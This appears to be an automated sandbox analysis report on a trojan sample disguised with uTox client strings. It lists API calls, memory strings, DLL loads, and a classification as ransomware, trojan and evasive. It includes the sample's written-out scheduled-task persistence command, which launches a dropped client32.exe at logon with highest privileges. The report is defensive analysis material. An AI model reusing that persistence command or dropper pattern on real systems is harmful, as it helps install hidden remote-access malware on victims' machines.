Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: 6_2_11112960 SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,RegCloseKey,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,RegCloseKey,SystemParametersInfoA,		6_2_11112960

Source: C:\Users\user\AppData\Local\DNScache\client32.exe

Code function: 4_2_110A9020: DeviceIoControl,

4_2_110A9020

Source: C:\Users\user\AppData\Local\DNScache\client32.exe

Code function: 4_2_1115A250 FindWindowA,_memset,CreateProcessAsUserA,GetLastError,WinExec,CloseHandle,CloseHandle,CloseHandle,WinExec,

4_2_1115A250

Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: 4_2_1102D1B3 CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,	4_2_1102D1B3
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: 4_2_1102CE84 Sleep,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,	4_2_1102CE84
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: 6_2_1102CD90 InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,PostThreadMessageA,PostThreadMessageA,CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,	6_2_1102CD90

Source: C:\Users\user\Desktop\lFxGd66yDa.exe	Code function: 0_2_00191000	0_2_00191000
Source: C:\Users\user\Desktop\lFxGd66yDa.exe	Code function: 0_2_00191420	0_2_00191420
Source: C:\Users\user\Desktop\lFxGd66yDa.exe	Code function: 0_2_001969E0	0_2_001969E0
Source: C:\Users\user\Desktop\lFxGd66yDa.exe	Code function: 0_2_00191A80	0_2_00191A80
Source: C:\Users\user\Desktop\lFxGd66yDa.exe	Code function: 0_2_00193C20	0_2_00193C20
Source: C:\Users\user\Desktop\lFxGd66yDa.exe	Code function: 0_2_001A7867	0_2_001A7867
Source: C:\Users\user\Desktop\lFxGd66yDa.exe	Code function: 0_2_00196120	0_2_00196120
Source: C:\Users\user\Desktop\lFxGd66yDa.exe	Code function: 0_2_00195D40	0_2_00195D40
Source: C:\Users\user\Desktop\lFxGd66yDa.exe	Code function: 0_2_00194580	0_2_00194580
Source: C:\Users\user\Desktop\lFxGd66yDa.exe	Code function: 0_2_0019BAFC	0_2_0019BAFC
Source: C:\Users\user\Desktop\lFxGd66yDa.exe	Code function: 0_2_00194B40	0_2_00194B40
Source: C:\Users\user\Desktop\lFxGd66yDa.exe	Code function: 0_2_001A2340	0_2_001A2340
Source: C:\Users\user\Desktop\lFxGd66yDa.exe	Code function: 0_2_00192FB0	0_2_00192FB0
Source: C:\Users\user\Desktop\lFxGd66yDa.exe	Code function: 0_2_001A27EB	0_2_001A27EB
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: 4_2_11029200	4_2_11029200
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: 4_2_110612D0	4_2_110612D0
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: 4_2_110724D0	4_2_110724D0
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: 4_2_1102B1F0	4_2_1102B1F0
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: 4_2_1115B090	4_2_1115B090
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: 4_2_1106F200	4_2_1106F200
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: 4_2_1107F590	4_2_1107F590
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: 4_2_1115F900	4_2_1115F900
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: 4_2_1101B950	4_2_1101B950
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: 4_2_11163B65	4_2_11163B65
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: 4_2_1101BD90	4_2_1101BD90
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: 4_2_110503E0	4_2_110503E0
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: 4_2_1116A6AB	4_2_1116A6AB
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: 4_2_110329A0	4_2_110329A0
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: 4_2_11122860	4_2_11122860
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: 4_2_1100887B	4_2_1100887B
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: 4_2_11044B90	4_2_11044B90
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: 4_2_1101CBB0	4_2_1101CBB0
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: 4_2_11086D60	4_2_11086D60
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: 4_2_6C3CA980	4_2_6C3CA980
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: 4_2_6C3F3DB8	4_2_6C3F3DB8
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: 4_2_6C3F3923	4_2_6C3F3923
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: 4_2_6C3F4910	4_2_6C3F4910
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: 4_2_6C3CDBA0	4_2_6C3CDBA0
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: 4_2_6C3D84F0	4_2_6C3D84F0
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: 4_2_6C3F4528	4_2_6C3F4528
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: 4_2_6C3ED70F	4_2_6C3ED70F
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: 4_2_6C3C1760	4_2_6C3C1760
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: 4_2_6C3FA063	4_2_6C3FA063
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: 4_2_6C3F4156	4_2_6C3F4156
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: 4_2_6C3C1310	4_2_6C3C1310
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: 4_2_6C3E43C0	4_2_6C3E43C0
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: 4_2_6C616E24	4_2_6C616E24
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: 4_2_6C616E28	4_2_6C616E28
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: 4_2_6C676E18	4_2_6C676E18
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: 4_2_6C630919	4_2_6C630919
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: 4_2_6C690915	4_2_6C690915
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: 4_2_6C64EB1A	4_2_6C64EB1A
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: 4_2_6C618468	4_2_6C618468
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: 4_2_6C6245AE	4_2_6C6245AE
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: 4_2_6C6A67FF	4_2_6C6A67FF
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: 4_2_6C67E7F1	4_2_6C67E7F1
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: 4_2_6C674159	4_2_6C674159
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: 4_2_6C6021F0	4_2_6C6021F0
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: 4_2_6C61A1DD	4_2_6C61A1DD
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: 4_2_6C65A277	4_2_6C65A277
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: 4_2_6C698220	4_2_6C698220
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: 4_2_6C6722CD	4_2_6C6722CD
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: 6_2_110612D0	6_2_110612D0
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: 6_2_1102B1F0	6_2_1102B1F0
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: 6_2_1115B090	6_2_1115B090
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: 6_2_11029200	6_2_11029200
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: 6_2_1106F200	6_2_1106F200
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: 6_2_1107F590	6_2_1107F590
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: 6_2_1115F900	6_2_1115F900
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: 6_2_1101B950	6_2_1101B950
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: 6_2_11163B65	6_2_11163B65
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: 6_2_1101BD90	6_2_1101BD90
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: 6_2_110503E0	6_2_110503E0
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: 6_2_110724D0	6_2_110724D0
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: 6_2_1116A6AB	6_2_1116A6AB
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: 6_2_110329A0	6_2_110329A0
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: 6_2_11122860	6_2_11122860
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: 6_2_1100887B	6_2_1100887B
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: 6_2_11044B90	6_2_11044B90
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: 6_2_1101CBB0	6_2_1101CBB0
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: 6_2_11086D60	6_2_11086D60

Source: C:\Users\user\AppData\Local\DNScache\client32.exe

Process token adjusted: Security

Jump to behavior

Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: String function: 6C610950 appears 74 times
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: String function: 6C3D7D00 appears 135 times
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: String function: 6C3C6F50 appears 171 times
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: String function: 110B6AB0 appears 41 times
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: String function: 6C610934 appears 33 times
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: String function: 6C3EF3CB appears 33 times
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: String function: 1116B6F0 appears 74 times
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: String function: 6C3D7C70 appears 36 times
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: String function: 6C3E9480 appears 61 times
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: String function: 110274F0 appears 94 times
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: String function: 1116FD13 appears 40 times
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: String function: 1109C970 appears 32 times
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: String function: 1105D480 appears 54 times
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: String function: 110290C0 appears 2088 times
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: String function: 6C3C30A0 appears 54 times
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: String function: 11142790 appears 1186 times
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: String function: 111606A0 appears 64 times
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: String function: 6C3D7A90 appears 62 times
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: String function: 11080CC0 appears 85 times
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: String function: 1115CAC3 appears 94 times
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: String function: 11143200 appears 46 times
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: String function: 1105D350 appears 564 times
Source: C:\Users\user\Desktop\lFxGd66yDa.exe	Code function: String function: 00197AE0 appears 33 times

Source: mscpx32r.dLL.0.dr	Static PE information: No import functions for PE file found
Source: neth.dll.0.dr	Static PE information: No import functions for PE file found
Source: netmsg.dll.0.dr	Static PE information: No import functions for PE file found

Source: lFxGd66yDa.exe, 00000000.00000003.2217053423.0000000000B2A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclient32.exe0 vs lFxGd66yDa.exe
Source: lFxGd66yDa.exe, 00000000.00000002.2258602434.0000000000B19000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameneth.DLLj% vs lFxGd66yDa.exe
Source: lFxGd66yDa.exe, 00000000.00000003.2192368792.0000000000B2A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclient32.exe0 vs lFxGd66yDa.exe
Source: lFxGd66yDa.exe, 00000000.00000003.2217650314.0000000000B75000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamemscpx32r.dllj% vs lFxGd66yDa.exe
Source: lFxGd66yDa.exe, 00000000.00000003.2217650314.0000000000B75000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamemsvcp140_codecvt_ids.dllT vs lFxGd66yDa.exe
Source: lFxGd66yDa.exe, 00000000.00000003.2254498750.0000000000B70000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamemscpx32r.dllj% vs lFxGd66yDa.exe
Source: lFxGd66yDa.exe, 00000000.00000003.2254498750.0000000000B70000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamemsvcp140_codecvt_ids.dllT vs lFxGd66yDa.exe
Source: lFxGd66yDa.exe, 00000000.00000003.2193914404.0000000000B22000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamemscpx32r.dllj% vs lFxGd66yDa.exe
Source: lFxGd66yDa.exe, 00000000.00000003.2217525712.0000000000B22000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamemsvcp140_codecvt_ids.dllT vs lFxGd66yDa.exe
Source: lFxGd66yDa.exe, 00000000.00000003.2254464370.0000000000B22000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclient32.exe0 vs lFxGd66yDa.exe
Source: lFxGd66yDa.exe, 00000000.00000003.2254464370.0000000000B22000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamemscpx32r.dllj% vs lFxGd66yDa.exe
Source: lFxGd66yDa.exe, 00000000.00000003.2254464370.0000000000B22000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamemsvcp140_codecvt_ids.dllT vs lFxGd66yDa.exe
Source: lFxGd66yDa.exe, 00000000.00000003.2192434264.0000000000B71000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamemscxpl32.dllj% vs lFxGd66yDa.exe
Source: lFxGd66yDa.exe, 00000000.00000003.2217053423.0000000000B74000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamemscpx32r.dllj% vs lFxGd66yDa.exe
Source: lFxGd66yDa.exe, 00000000.00000003.2217053423.0000000000B74000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamepcichek.dll0 vs lFxGd66yDa.exe
Source: lFxGd66yDa.exe, 00000000.00000003.2191851430.0000000000B22000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclient32.exe0 vs lFxGd66yDa.exe
Source: lFxGd66yDa.exe, 00000000.00000003.2217553672.0000000000B75000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamemscpx32r.dllj% vs lFxGd66yDa.exe
Source: lFxGd66yDa.exe, 00000000.00000003.2217553672.0000000000B75000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamemsvcp140_codecvt_ids.dllT vs lFxGd66yDa.exe
Source: lFxGd66yDa.exe, 00000000.00000002.2258602434.0000000000B30000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclient32.exe0 vs lFxGd66yDa.exe
Source: lFxGd66yDa.exe, 00000000.00000002.2258602434.0000000000B30000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamemscpx32r.dllj% vs lFxGd66yDa.exe
Source: lFxGd66yDa.exe, 00000000.00000002.2258602434.0000000000B30000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamemsvcp140_codecvt_ids.dllT vs lFxGd66yDa.exe
Source: lFxGd66yDa.exe, 00000000.00000002.2258602434.0000000000B30000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameschtasks.exe.muij% vs lFxGd66yDa.exe
Source: lFxGd66yDa.exe, 00000000.00000002.2258602434.0000000000B30000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameschtasks.exej% vs lFxGd66yDa.exe
Source: lFxGd66yDa.exe, 00000000.00000003.2217221510.0000000000B22000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameremcmdstub.exe0 vs lFxGd66yDa.exe
Source: lFxGd66yDa.exe, 00000000.00000003.2192581404.0000000000B75000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamemscxpl32.dllj% vs lFxGd66yDa.exe
Source: lFxGd66yDa.exe, 00000000.00000003.2217444342.0000000000B75000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamemscpx32r.dllj% vs lFxGd66yDa.exe
Source: lFxGd66yDa.exe, 00000000.00000003.2217444342.0000000000B75000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamemsvcp140_1.dllT vs lFxGd66yDa.exe
Source: lFxGd66yDa.exe, 00000000.00000003.2217142601.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclient32.exe0 vs lFxGd66yDa.exe
Source: lFxGd66yDa.exe, 00000000.00000003.2192469922.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclient32.exe0 vs lFxGd66yDa.exe
Source: lFxGd66yDa.exe, 00000000.00000003.2217417326.0000000000B22000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamemsvcp140_1.dllT vs lFxGd66yDa.exe
Source: lFxGd66yDa.exe, 00000000.00000003.2217237059.0000000000B75000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamemscpx32r.dllj% vs lFxGd66yDa.exe
Source: lFxGd66yDa.exe, 00000000.00000003.2217237059.0000000000B75000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameremcmdstub.exe0 vs lFxGd66yDa.exe
Source: lFxGd66yDa.exe, 00000000.00000003.2193775165.0000000000B22000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameAudioCaptureWVI.dll0 vs lFxGd66yDa.exe
Source: lFxGd66yDa.exe, 00000000.00000003.2192368792.0000000000B22000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamemscxpl32.dllj% vs lFxGd66yDa.exe
Source: lFxGd66yDa.exe, 00000000.00000003.2217359700.0000000000B75000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamemscpx32r.dllj% vs lFxGd66yDa.exe
Source: lFxGd66yDa.exe, 00000000.00000003.2217359700.0000000000B75000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameremcmdstub.exe0 vs lFxGd66yDa.exe
Source: lFxGd66yDa.exe, 00000000.00000003.2217053423.0000000000B22000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamepcichek.dll0 vs lFxGd66yDa.exe
Source: lFxGd66yDa.exe	Binary or memory string: OriginalFilenameuTox.exe* vs lFxGd66yDa.exe

Source: lFxGd66yDa.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.rans.troj.evad.winEXE@7/26@3/3

Source: C:\Users\user\AppData\Local\DNScache\client32.exe

Code function: 4_2_11059290 GetLastError,FormatMessageA,LocalFree,

4_2_11059290

Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: 4_2_1109C580 AdjustTokenPrivileges,CloseHandle,	4_2_1109C580
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: 4_2_1109C4F0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,	4_2_1109C4F0
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: 6_2_1109C580 AdjustTokenPrivileges,CloseHandle,	6_2_1109C580
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: 6_2_1109C4F0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,	6_2_1109C4F0

Source: C:\Users\user\AppData\Local\DNScache\client32.exe

Code function: 4_2_11095A00 GetTickCount,CoInitialize,CLSIDFromProgID,CoCreateInstance,CoUninitialize,

4_2_11095A00

Source: C:\Users\user\AppData\Local\DNScache\client32.exe

Code function: 4_2_110CC3D0 IsWindow,IsWindowVisible,SetForegroundWindow,FindResourceExA,LoadResource,LockResource,DialogBoxIndirectParamA,DialogBoxParamA,

4_2_110CC3D0

Source: C:\Users\user\AppData\Local\DNScache\client32.exe

Code function: 4_2_11124DC0 GetMessageA,Sleep,OpenSCManagerA,DispatchMessageA,OpenServiceA,CloseServiceHandle,StartServiceA,GetLastError,CloseServiceHandle,CloseServiceHandle,GetLastError,CloseServiceHandle,GetLastError,

4_2_11124DC0

Source: C:\Users\user\Desktop\lFxGd66yDa.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\2nd2_1[1].zip

Jump to behavior

Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Mutant created: NULL
Source: C:\Users\user\Desktop\lFxGd66yDa.exe	Mutant created: \Sessions\1\BaseNamedObjects\bghe5h5enr5ejm45nt6tv453v43cv45hn45nm
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6484:120:WilError_03

Source: lFxGd66yDa.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\lFxGd66yDa.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\lFxGd66yDa.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: lFxGd66yDa.exe

ReversingLabs: Detection: 63%

Source: lFxGd66yDa.exe	String found in binary or memory: -h --help Shows this help text.
Source: lFxGd66yDa.exe	String found in binary or memory: -h --help Shows this help text.
Source: lFxGd66yDa.exe	String found in binary or memory: Search/Add Friends
Source: lFxGd66yDa.exe	String found in binary or memory: Tox will automatically start encrypting with this password.There is no way to recover lost passwords.Add New Device to networkNumber of linked devicesAdd New ContactTox IDMessageOnline ContactsAll ContactsToggle filtering of offline contacts.AddFriend RequestUser SettingsFriend SettingsNameStatus MessagePreviewAudio Input DeviceAudio FilteringAudio Output DeviceVideo Input DeviceVideo Frame Rate (FPS)Push To TalkStatusOnlineAwayBusyOfflineuTox %.*s is now %s.Use mini contact listAuto hide sidebarNot ConnectedAdjust network settingsOther SettingsUIuTox SettingsNetwork SettingsProfile PasswordDisconnects from Tox and locks this profile.Show password fieldClick to show profile password field. Changes made here will be instant!Hide password fieldClick to hide profile password field.Password must be at least 4 characters longLockAudio/VideoDPIIPv6UDPProxy (SOCKS 5)Force uTox to always use proxyEnable Audible Notification (Ringtone)RingtoneClose To TrayStart In TrayShow QR codeHide QR codeSave QR codeCopy as textCopy (Include Names)Remove FriendChange TopicSet aliasAliasSend messageSend a screenshotCustom DPI 60%Custom DPI 70%Custom DPI 80%Custom DPI 90%Custom DPI 100%Custom DPI 110%Custom DPI 120%Custom DPI 130%Custom DPI 140%Custom DPI 150%Custom DPI 160%Custom DPI 170%Custom DPI 180%Custom DPI 190%Custom DPI 200%Custom DPI 210%Custom DPI 220%Custom DPI 230%Custom DPI 240%Custom DPI 250%Custom DPI 260%Custom DPI 270%Custom DPI 280%Custom DPI 290%Custom DPI 300%ShowHideExitDefault LoopbackOpenSL InputPlease accept this friend request.Search/Add FriendsIP addressPortVideo PreviewMuteUnmuteSelect AvatarAvatar too large. Maximum size: Cannot find selected file or selected file is empty.Clear historyLaunch at system startupThemeDefaultLight themeDark themeHigh contrastCustom (see docs)ZenburnSolarized-lightSolarized-darkSend typing notificationsStatus NotificationsRandomize NospamNospamRevert NospamChanging your nospam will cause your old tox ID to no longer work. uTox does not update your ID on name servers.Block Friend RequestsShow Nospam SettingsHide Nospam SettingsDelete FriendAre you sure you want to delete Keep
Source: lFxGd66yDa.exe	String found in binary or memory: impossible: unknown friend-add error
Source: lFxGd66yDa.exe	String found in binary or memory: toxEsaveAssertion failedAttempted to kill tox while toxav is still aliveimpossible: unknown friend-add error_a

Source: unknown	Process created: C:\Users\user\Desktop\lFxGd66yDa.exe "C:\Users\user\Desktop\lFxGd66yDa.exe"
Source: C:\Users\user\Desktop\lFxGd66yDa.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\system32\schtasks.exe" /create /sc ONLOGON /tn "DNScache" /tr "C:\Users\user\AppData\Local\DNScache\client32.exe" /RL HIGHEST
Source: C:\Users\user\Desktop\lFxGd66yDa.exe	Process created: C:\Users\user\AppData\Local\DNScache\client32.exe C:\Users\user\AppData\Local\DNScache\client32.exe
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\AppData\Local\DNScache\client32.exe C:\Users\user\AppData\Local\DNScache\client32.exe
Source: C:\Users\user\Desktop\lFxGd66yDa.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\system32\schtasks.exe" /create /sc ONLOGON /tn "DNScache" /tr "C:\Users\user\AppData\Local\DNScache\client32.exe" /RL HIGHEST	Jump to behavior
Source: C:\Users\user\Desktop\lFxGd66yDa.exe	Process created: C:\Users\user\AppData\Local\DNScache\client32.exe C:\Users\user\AppData\Local\DNScache\client32.exe	Jump to behavior

Source: C:\Users\user\Desktop\lFxGd66yDa.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\lFxGd66yDa.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\lFxGd66yDa.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\lFxGd66yDa.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\lFxGd66yDa.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\lFxGd66yDa.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\lFxGd66yDa.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\lFxGd66yDa.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\lFxGd66yDa.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\lFxGd66yDa.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\lFxGd66yDa.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\lFxGd66yDa.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\lFxGd66yDa.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\lFxGd66yDa.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\lFxGd66yDa.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\lFxGd66yDa.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\lFxGd66yDa.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\lFxGd66yDa.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\lFxGd66yDa.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\lFxGd66yDa.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\lFxGd66yDa.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\lFxGd66yDa.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\lFxGd66yDa.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\lFxGd66yDa.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\lFxGd66yDa.exe	Section loaded: cryptsp.dll	Jump to behavior
